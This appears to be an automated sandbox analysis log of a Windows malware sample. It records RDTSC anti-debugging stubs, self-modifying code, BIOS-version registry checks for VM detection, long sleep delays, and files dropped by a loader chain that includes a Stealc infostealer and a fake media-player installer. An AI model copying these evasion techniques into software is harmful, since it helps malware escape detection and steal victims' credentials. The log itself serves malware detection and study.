Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180775 second address: 518079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4CAB982Ah 0x00000008 mov dx, 0CF6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA1ED00690Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518079A second address: 518079E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518079E second address: 51807A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51807A4 second address: 518084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FA1ECFCB2A0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA1ECFCB2A1h 0x00000017 sbb eax, 0BD76266h 0x0000001d jmp 00007FA1ECFCB2A1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FA1ECFCB2A0h 0x00000029 and cx, D208h 0x0000002e jmp 00007FA1ECFCB29Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a mov ecx, edi 0x0000003c popad 0x0000003d push esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jmp 00007FA1ECFCB2A5h 0x00000046 call 00007FA1ECFCB2A0h 0x0000004b pop eax 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518084F second address: 51808B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA1ED00690Dh 0x00000015 sub ecx, 239B27E6h 0x0000001b jmp 00007FA1ED006911h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FA1ED006910h 0x00000027 and al, FFFFFF88h 0x0000002a jmp 00007FA1ED00690Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51808B0 second address: 51808B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51808B6 second address: 51808BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51808BA second address: 51808E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FA1ECFCB2A7h 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, ecx 0x00000017 movzx esi, bx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51808E7 second address: 5180936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 65768AEBh 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 jmp 00007FA1ED00690Ah 0x00000015 je 00007FA25ED9C393h 0x0000001b pushad 0x0000001c mov ecx, 4192428Dh 0x00000021 pushfd 0x00000022 jmp 00007FA1ED00690Ah 0x00000027 and eax, 09E832A8h 0x0000002d jmp 00007FA1ED00690Bh 0x00000032 popfd 0x00000033 popad 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180936 second address: 5180952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB2A0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ecx, 01323687h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180952 second address: 518096F instructions: 0x00000000 rdtsc 0x00000002 mov cl, B4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1ED006912h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 518096F second address: 5180988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov di, 1B80h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FA25ED60CBEh 0x00000012 pushad 0x00000013 push edx 0x00000014 mov bl, cl 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180988 second address: 51809A7 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 jne 00007FA25ED9C321h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51809A7 second address: 51809AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51809AB second address: 51809B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51809B1 second address: 5180A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4409E9C5h 0x00000008 pushfd 0x00000009 jmp 00007FA1ECFCB2A2h 0x0000000e adc ah, 00000058h 0x00000011 jmp 00007FA1ECFCB29Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA1ECFCB2A4h 0x00000024 or eax, 1A48E9B8h 0x0000002a jmp 00007FA1ECFCB29Bh 0x0000002f popfd 0x00000030 movzx ecx, bx 0x00000033 popad 0x00000034 push ebx 0x00000035 pushad 0x00000036 mov edx, ecx 0x00000038 pushad 0x00000039 mov di, ax 0x0000003c mov eax, 64F96BFBh 0x00000041 popad 0x00000042 popad 0x00000043 mov dword ptr [esp], ebx 0x00000046 jmp 00007FA1ECFCB29Eh 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FA1ECFCB29Ah 0x00000053 sub si, 0E78h 0x00000058 jmp 00007FA1ECFCB29Bh 0x0000005d popfd 0x0000005e popad 0x0000005f push eax 0x00000060 jmp 00007FA1ECFCB2A9h 0x00000065 xchg eax, ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FA1ECFCB29Dh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180A76 second address: 5180A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180B2B second address: 5180B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ECFCB2A0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5180B5B second address: 5180B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190E55 second address: 5190E72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190E72 second address: 5190E97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1ED006917h 0x00000008 mov edi, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190E97 second address: 5190E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190BA3 second address: 5190BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ED00690Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190BB5 second address: 5190C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA1ECFCB2A6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA1ECFCB29Dh 0x0000001c or ax, 7806h 0x00000021 jmp 00007FA1ECFCB2A1h 0x00000026 popfd 0x00000027 mov bh, cl 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190C0A second address: 5190C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ED006919h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200E53 second address: 5200E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200E59 second address: 5200E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ED006911h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200E78 second address: 5200E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52001FF second address: 5200205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200205 second address: 5200209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200209 second address: 5200255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, A5D0h 0x00000013 pushfd 0x00000014 jmp 00007FA1ED006919h 0x00000019 xor si, 3256h 0x0000001e jmp 00007FA1ED006911h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200255 second address: 520025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520025B second address: 520025F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520025F second address: 5200285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5200285 second address: 520028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520028B second address: 52002CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1ECFCB2A8h 0x00000014 add esi, 5522C868h 0x0000001a jmp 00007FA1ECFCB29Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52002CE second address: 5200322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 pushfd 0x00000011 jmp 00007FA1ED00690Fh 0x00000016 xor ax, F90Eh 0x0000001b jmp 00007FA1ED006919h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7AEA3F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7AEAFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 94C746 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 94CAD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7AC586 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 954F7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9D76F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: A3EA3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: A3EAFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: BDC746 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: BDCAD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: A3C586 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: BE4F7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: C676F1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Special instruction interceptor: First address: 63EE73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Special instruction interceptor: First address: 63EEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Special instruction interceptor: First address: 80DAC5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Special instruction interceptor: First address: 871FE3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Special instruction interceptor: First address: 2ADFC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Special instruction interceptor: First address: 473E3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Special instruction interceptor: First address: 4DDB99 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Special instruction interceptor: First address: 2B409E instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory allocated: 610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory allocated: 1A510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Memory allocated: 4A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Memory allocated: 4C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Memory allocated: 6C60000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052004B0 rdtsc

0_2_052004B0

Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1060	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1131	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1087	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1130	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1138	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Window / User API: threadDelayed 1177
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window / User API: threadDelayed 356
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window / User API: threadDelayed 354

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-A2FGH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpango-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\yxrd0ob7[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdkmm-2.4-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IRAOB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001527001\yxrd0ob7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-TQ33C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-JIOLC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-7L9K5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EQ0NL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangoft2-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-2MA22.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-C986N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpcre-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangowin32-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpng16-16.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangomm-1.4-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-ADJOR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-T38SK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-F3PSE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EOQJN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-OJPOO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EV6NO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libglibmm-2.4-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgomp-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libsigc-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\hhnjqu9y[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libharfbuzz-0.dll (copy)	Jump to dropped file
